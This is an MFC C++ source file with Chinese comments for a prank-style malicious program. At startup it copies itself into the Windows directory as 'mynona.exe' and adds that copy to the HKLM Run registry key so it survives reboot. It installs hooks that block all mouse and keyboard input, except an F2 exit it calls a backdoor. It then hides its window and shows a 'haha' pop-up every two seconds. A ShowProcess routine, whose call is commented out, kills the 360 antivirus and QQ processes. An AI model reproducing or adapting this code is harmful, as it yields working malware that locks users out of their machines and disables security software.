// KeyBoardHookDialogDlg.cpp : implementation file // #include "stdafx.h" #include "KeyBoardHookDialog.h" #include "KeyBoardHookDialogDlg.h" #define REG_RUN "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" #include <tlhelp32.h> #ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif //#pragma comment (lib,"KeyBoardHook") ///////////////////////////////////////////////////////////////////////////// // CAboutDlg dialog used for App About //定义全局HHOOK变量,用于保存 HHOOK g_hMouse; HHOOK g_hKeyboard; bool isTrue = false; HWND hWnd; //保存当前句柄 //注意以下俩个钩子过程是全局函数,所以里面的API要用全局的 LRESULT CALLBACK MouseProc( int nCode, // hook code WPARAM wParam, // message identifier LPARAM lParam // mouse coordinates ) { return 1; } LRESULT CALLBACK KeyboardProc( int code, // hook code WPARAM wParam, // virtual-key code LPARAM lParam // keystroke-message information ) { // if(VK_SPACE == wParam || VK_RETURN == wParam) //屏蔽空格和回车键 /* if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键 return 1; else return CallNextHookEx(g_hKeyboard,code,wParam,lParam);*/ //留个后门,使当按下F2键时,程序将退 if(VK_F2 == wParam) { //调用全局API函数向程序发出关闭消息 ::SendMessage(hWnd,WM_CLOSE,0,0); //卸载钩子 UnhookWindowsHookEx(g_hMouse); UnhookWindowsHookEx(g_hKeyboard); } return 1; } class CAboutDlg : public CDialog { public: CAboutDlg(); // Dialog Data //{{AFX_DATA(CAboutDlg) enum { IDD = IDD_ABOUTBOX }; //}}AFX_DATA // ClassWizard generated virtual function overridesf //{{AFX_VIRTUAL(CAboutDlg) protected: virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support //}}AFX_VIRTUAL // Implementation protected: //{{AFX_MSG(CAboutDlg) //}}AFX_MSG DECLARE_MESSAGE_MAP() }; CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD) { //{{AFX_DATA_INIT(CAboutDlg) //}}AFX_DATA_INIT } void CAboutDlg::DoDataExchange(CDataExchange* pDX) { CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CAboutDlg) //}}AFX_DATA_MAP } BEGIN_MESSAGE_MAP(CAboutDlg, CDialog) //{{AFX_MSG_MAP(CAboutDlg) // No message handlers //}}AFX_MSG_MAP END_MESSAGE_MAP() ///////////////////////////////////////////////////////////////////////////// // CKeyBoardHookDialogDlg dialog CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd* pParent /*=NULL*/) : CDialog(CKeyBoardHookDialogDlg::IDD, pParent) { //{{AFX_DATA_INIT(CKeyBoardHookDialogDlg) // NOTE: the ClassWizard will add member initialization here //}}AFX_DATA_INIT // Note that LoadIcon does not require a subsequent DestroyIcon in Win32 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME); } void CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange* pDX) { CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CKeyBoardHookDialogDlg) // NOTE: the ClassWizard will add DDX and DDV calls here //}}AFX_DATA_MAP } BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog) //{{AFX_MSG_MAP(CKeyBoardHookDialogDlg) ON_WM_SYSCOMMAND() ON_WM_PAINT() ON_WM_QUERYDRAGICON() ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon) ON_WM_TIMER() //}}AFX_MSG_MAP END_MESSAGE_MAP() ///////////////////////////////////////////////////////////////////////////// // CKeyBoardHookDialogDlg message handlers BOOL CKeyBoardHookDialogDlg::OnInitDialog() { CDialog::OnInitDialog(); // Add "About..." menu item to system menu. // IDM_ABOUTBOX must be in the system command range. ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX); ASSERT(IDM_ABOUTBOX < 0xF000); CMenu* pSysMenu = GetSystemMenu(FALSE); if (pSysMenu != NULL) { CString strAboutMenu; strAboutMenu.LoadString(IDS_ABOUTBOX); if (!strAboutMenu.IsEmpty()) { pSysMenu->AppendMenu(MF_SEPARATOR); pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu); } } // Set the icon for this dialog. The framework does this automatically // when the application's main window is not a dialog SetIcon(m_hIcon, TRUE); // Set big icon SetIcon(m_hIcon, FALSE); // Set small icon // TODO: Add extra initialization here CopySelf(); autoRun();//注册表启动 //设定钩子 // ShowProcess(); g_hMouse = SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId()); g_hKeyboard = SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId()); //保存句柄 hWnd = m_hWnd; SetTimer(1, 2000, NULL); isTrue = true; return TRUE; // return TRUE unless you set the focus to a control } void CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam) { if ((nID & 0xFFF0) == IDM_ABOUTBOX) { CAboutDlg dlgAbout; dlgAbout.DoModal(); } else { CDialog::OnSysCommand(nID, lParam); } } // If you add a minimize button to your dialog, you will need the code below // to draw the icon. For MFC applications using the document/view model, // this is automatically done for you by the framework. void CKeyBoardHookDialogDlg::OnPaint() { if (IsIconic()) { CPaintDC dc(this); // device context for painting SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0); // Center icon in client rectangle int cxIcon = GetSystemMetrics(SM_CXICON); int cyIcon = GetSystemMetrics(SM_CYICON); CRect rect; GetClientRect(&rect); int x = (rect.Width() - cxIcon + 1) / 2; int y = (rect.Height() - cyIcon + 1) / 2; // Draw the icon dc.DrawIcon(x, y, m_hIcon); } else { CDialog::OnPaint(); } } // The system calls this to obtain the cursor to display while the user drags // the minimized window. HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon() { return (HCURSOR) m_hIcon; } void CKeyBoardHookDialogDlg::OnBtnHookon() { // TODO: Add your control notification handler code here } //DEL void CKeyBoardHookDialogDlg::OnBtnHookoff() //DEL { //DEL // TODO: Add your control notification handler code here //DEL SetHookOff(); //DEL //DEL } void CKeyBoardHookDialogDlg::hide() { ShowWindow(SW_HIDE); } void CKeyBoardHookDialogDlg::autoRun() { HKEY hKey = NULL; LONG lRet = RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey); if(lRet != ERROR_SUCCESS) { return; } RegSetValueEx(hKey,"mynona",NULL,REG_SZ,(const unsigned char *)&szWindowsPath, strlen(szWindowsPath) +sizeof(char)); RegCloseKey(hKey); } void CKeyBoardHookDialogDlg::ShowProcess() { HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL); //... PROCESSENTRY32 Pe32 = {0}; Pe32.dwSize = sizeof(PROCESSENTRY32); int bRet = Process32First(hSnap,&Pe32); //360IOSMgrSrv 360tray char name[MAX_PATH] = "QQ.exe"; char name2[MAX_PATH] = "360tray.exe"; char name3[MAX_PATH] = "360rp.exe"; while(bRet) { //... bRet = Process32Next(hSnap,&Pe32); //cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl; int flag = 0; if(strcmp(Pe32.szExeFile,name) == 0 || strcmp(Pe32.szExeFile,name3) == 0 || strcmp(Pe32.szExeFile,name2) ==0) flag = 1; if(flag){ // cout<<"----------------------"<<Pe32.th32ProcessID<<endl; MessageBox(Pe32.szExeFile); HANDLE hProcess = OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID); LPDWORD lpExitCode = 0; GetExitCodeProcess(hProcess, lpExitCode); TerminateProcess(hProcess, (UINT)lpExitCode); } } } void CKeyBoardHookDialogDlg::CopySelf() { char szSelfName[MAX_PATH] = {0}; // char szSystemPath[MAX_PATH] = {0}; char szTmpPath[MAX_PATH] = {0}; //获取当前程序自身路径 GetModuleFileName(NULL,szSelfName,MAX_PATH); //cout<<"szSelfName:"<<szSelfName<<endl; //获取系统目录 GetWindowsDirectory(szWindowsPath,MAX_PATH); // cout<<"szWindowsPath:"<<szWindowsPath<<endl; //获取windows目录 // GetSystemDirectory(szSystemPath,MAX_PATH); //cout<<"szSystemPath:"<<szSystemPath<<endl; strcat(szWindowsPath,"\mynona.exe"); //strcat(szSystemPath,"\mynona.exe"); MessageBox( szWindowsPath,": szWindowsPath"); //MessageBox( szSystemPath,": szSystemPath"); int isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);//FALSE表示强行覆盖原有文件 // int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE); } void CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent) { // TODO: Add your message handler code here and/or call default if(isTrue){ ShowWindow(SW_HIDE); } MessageBox("haha","哈哈",MB_ICONSTOP); CDialog::OnTimer(nIDEvent); }